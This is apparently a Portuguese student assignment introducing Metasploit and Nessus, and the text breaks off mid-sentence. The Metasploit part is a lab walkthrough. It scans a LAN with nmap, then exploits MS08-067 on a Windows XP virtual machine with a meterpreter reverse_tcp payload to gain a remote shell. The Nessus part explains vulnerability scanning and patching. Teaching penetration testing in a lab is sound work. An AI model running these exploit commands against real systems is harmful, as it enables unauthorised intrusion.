TRABALHO
Software Metasploit Framework
O que é >
Metasploit Framework é uma avançada plataforma Open Source,
concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits.
Escrito na maioria das vezes em "Perl" e com vários componentes desenvolvidos em "C” e “ Assembler", sua portabilidade está assegurada,
o que contribui em larga medida para a sua aceitação maciça, porque qualquer que seja a sua escolha de plataforma de uso,
pode instalá-lo e desfrutar todos os seus poderes em poucos minutos e sem grandes dificuldades Executando uma intrusão
Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (virtual)
e assim poder testar e estudar todas suas funcionalidades,
ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico. O cenário utilizado foi o seguinte:
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170. 2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186. SCANNING COM NMAP E METASPLOIT
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna. Abra um terminal no micro com o Backtrack e digite o seguinte comando:
# nmap -v --script=smb-check-vulns 192.168.0.0/24 v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas,
e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e ...
Obtemos nosso console do msf.
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit #E finalmente executamos nosso exploit. Observe a imagem abaixo.
Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.
Software Tenable Nessus
Tenable Nessus O Nessus é um software de auditoria de redes e varredura de vulnerabilidades que pode ser utilizado para descobrir falhas de segurança em sistemas UNIX e Windows.
É possível ajustar o aplicativo para reproduzir a política de segurança de sua empresa, dos relatórios públicos das agências de segurança NSA, CERT e CIS, dentre outras. QUAL E A SUA FUNÇAO
Tenable Nessus permite a sua função e permite a verificação de vulnerabilidade remota que pode ser utilizada para auditar sua internet com foco em endereços IP
para a rede e vulnerabilidades de aplicações web” a parti da nuvem’.
Ele executa a verificação da vulnerabilidade do ciclo de vida completo além do gerenciamento de configurações, empresas podem ainda comunicar
recomendações responsáveis, acompanhar remediações e verificar os patches de segurança e configurações necessárias e muito mais.
Utilizando o nessus
O Nessus utiliza um sistema cliente-servidor,
onde uma vez iniciado o módulo servidor passa a ser possível rodar o cliente em qualquer máquina da rede
(por esse motivo pode-se atribuir vários logins e senhas com permissões diversas). O certificado oferece uma segurança maior ao acessar o servidor Nessus,
pois garante que ele não foi substituído por outra máquina comprometida. Ressaltando que em ambientes
Windows somente é possível a instalação do Cliente NESSUS e não do Servidor(Gerente) O seguinte passo é inicializar o servidor, ainda como superusuário(root), usando o comando:
# nessusd -D
Após, volte ao seu login de usuário e abra o cliente, com o comando:
Agora você deverá logar-se no servidor Nessus, fornecendo seu login e senha. Nas
configurações do programa(abas superiores) você tem acesso a várias opções, entre elas a faixa de portas TCP e UDP que devem ser escaneadas:
Se você quiser um teste completo, use a faixa 1-65536. Este teste é ideal para PCs da rede local, mas pode demorar bastante caso seja feito via Internet. Basicamente, ele envia um pacote TCP
e outro pacote UDP para cada porta e para cada PC a ser testado. Se você quiser testar uma faixa inteira de endereços IP,
com seus 255 PCs teremos nada menos que 33.423.360 pacotes, que correspondem a mais de 750 MB de dados.
Alguns testes do Nessus podem travar alguns PCs vulneráveis,
como por exemplo estações Windows 95 vulneráveis ao "ping da morte".
A opção "Safe checks" desativa testes potencialmente perigosos, evitando prejuízos aos usuários. De qualquer forma, o ideal é fazer o teste à noite,
ou em algum horário em que os PCs não estejam sendo utilizados. Na seção "Target Selection" você define o alvo, fornecendo seu IP.
Se você quiser testar as vulnerabilidades da própria máquina local,
o endereço é o "localhost". Se você quiser testar de uma vez toda a sua rede local, basta fornecer o endereço da rede, como em "192.168.0.0" ou "10.0.0.0".
Concluído o teste, ele exibe uma lista com as vulnerabilidades encontradas em cada PC. Existem três níveis de alerta, o primeiro e mais grave tem o símbolo de uma luz vermelha
e indica uma brecha de segurança em um servidor ativo na máquina. O screenshot abaixo por exemplo temos uma máquina Linux rodando
uma versão antiga do Samba, que permite que clientes não autorizados se loguem no servidor . Além de apontar o problema, o Nessus oferece uma descrição detalhada da vulnerabilidade
e aponta uma solução.
O segundo nível é um alerta de que um serviço potencialmente inseguro
está ativo numa determinada porta do sistema, como por exemplo um servidor Telnet ou XDMCP (para obter a tela de login do servidor, como vimos no capítulo 7).
Neste caso não foi encontrada nenhuma vulnerabilidade específica,
mas o fato o serviço ser fundamentalmente inseguro já representa uma brecha de segurança. Tanto o Telnet quanto o XDMCP transmitem dados de forma não encriptada,
o que permite que alguém mal intencionado possa sniffar a rede, capturando os dados transmitidos, incluindo as senhas dos usuários.
O terceiro nível de alerta tem o símbolo de uma luz.
Estes são apenas lembretes de que existe um servidor ativo na porta indicada mas sem que fosse detectada qualquer brecha de segurança:
Naturalmente, assim como você pode utilizar o Nessus para detectar e tapar brechas de segurança,
outras pessoas podem utilizá-lo para detectar suas vulnerabilidades e lançar ataques.
Hoje em dia a variedade de scripts e ferramentas gráficas prontas que exploram vulnerabilidades é tão grande que você pode encontrar algum exploit fácil de usar para praticamente
Estes exploits prontos são o grande perigo,
pois não requerem nenhum tipo de prática ou habilidade para serem usados. Basta indicar o IP a ser atacado e pronto. Ou seja,
aquele garoto com quem você brigou no chat pode muito bem fazer um estrago na sua rede caso você tenha alguma vulnerabilidade grave,
por isso é importante resolver o problema antes que alguém o faça por você.
O Nessus é só o primeiro passo. Caso você rode qualquer tipo de servidor na sua máquina é importante acompanhar sites especializados em notícias relacionadas à segurança, c omo o http://lwn.net/- e o http://www.linuxsecurity.com/.
A maioria das distribuições oferecem boletins por e-mail que avisam quando novas atualizações de segurança estão disponíveis.
Lembre-se que apesar das notícias de brechas e atualizações serem sempre muito frequentes, você só precisa se preocupar com os servidores que você mantém ativos na sua máquina. Se você mantém apenas o SSH e o Proftp por exemplo,
não precisa se preocupar com as atualizações do Apache e do Sendmail. Além dos servidores, clientes de e-mail (Evolution, Kmail etc) e navegadores (Konqueror, Mozilla etc)
